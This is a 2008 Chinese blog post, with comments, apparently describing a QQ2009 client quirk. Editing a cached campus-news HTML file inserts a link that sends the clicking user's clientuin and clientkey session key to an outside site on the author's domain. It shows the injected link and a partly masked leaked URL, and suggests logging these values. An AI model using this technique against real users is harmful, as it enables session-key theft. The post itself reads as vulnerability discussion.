首页 > 网络安全 > QQ2009校友动态小BUG

QQ2009校友动态小BUG

2008年12月18日 发表评论 阅读评论

  如果一个QQ群,开通了QQ校友的话,那么在QQ群聊天面板会出现这样的情况:
  
  同时会在 Tencent\QQ2009\Users\QQ号\IE\CampusInfo 目录下面生成一个html,文件名不固定,我也没研究透,那么编辑该文件,就是在动态一栏显示的内容,在这个文件中,我们可以进行编辑,随时就可以在QQ群右侧更新出来。。
  比如,我写入:

<center><a href=http://www.woyigui.cn/xiaonei.php?test=qq>Fuck xiaonei</a></center>

  那么就会立即显示出来,其实也不算BUG,只不过在右侧显示时,我们只要点击 fuck xiaoyou 这个链接。那么他就会打开此链接,并加上一些参数,比如:

http://www.woyigui.cn/xiaoyou.php?test=qq&clientuin=283*88088&clientkey=****D7EC5564347AAFFD4E78792BC61FEA2F4A7D190BCF4086C61E1363C0D9&ADUIN=283*88088&ADSESSION=12**752&ADTAG=CLIENT.QQ.2137_

一些信息我加上星号,这样,我们只要在xiaonei.php文件中,接收这些数据,并保存下来,就有好戏了。只不过在利用时不太好利用,可以在QQ目录下用 echo 命令追加一些信息到  html中,但是如果有这个写权限,我们就没有必要做这种事了。。所以这东西只能玩玩。。

转载请注明:woyigui's blog [http://www.woyigui.cn/]
本文标题:QQ2009校友动态小BUG
本文地址:http://www.woyigui.cn/2008/12/18/QQ2009-xiaonei-bug/

分类: 网络安全 标签:
  1. se
    2008年12月18日11:53 | #1

    不错不错。   够隐藏了。   用处很大的说zan

    [回复]

    woyigui 回复:

    得和其他的一起利用才行。。

    [回复]

  2. hitlerboy
    2008年12月18日12:38 | #2

    早发现鸟,不是2009有这个bug,都可以这样改。
    意义不大,测试了一下,只有改本地有效果,如果提交到服务器,过滤的很厉害,没发现什么简单利用方法。

    [回复]

  3. hitlerboy
    2008年12月18日12:39 | #3

    不过,以前的版本是在%user%目录的temp目录下。
    而且,只能本地看到,别人是看不到的,没得利用。

    [回复]

    woyigui 回复:

    不是上传到服务器上,而是修改本地文件,等他自己去点击。如果可以上传到服务器的话,那影响的都是全群的人了。。

    [回复]

  4. 紫竹~
    2009年4月15日10:43 | #4

    不错,很不错,学习就应该这样,我要向你学习。

    [回复]

  1. 本文目前尚无任何 trackbacks 和 pingbacks.
*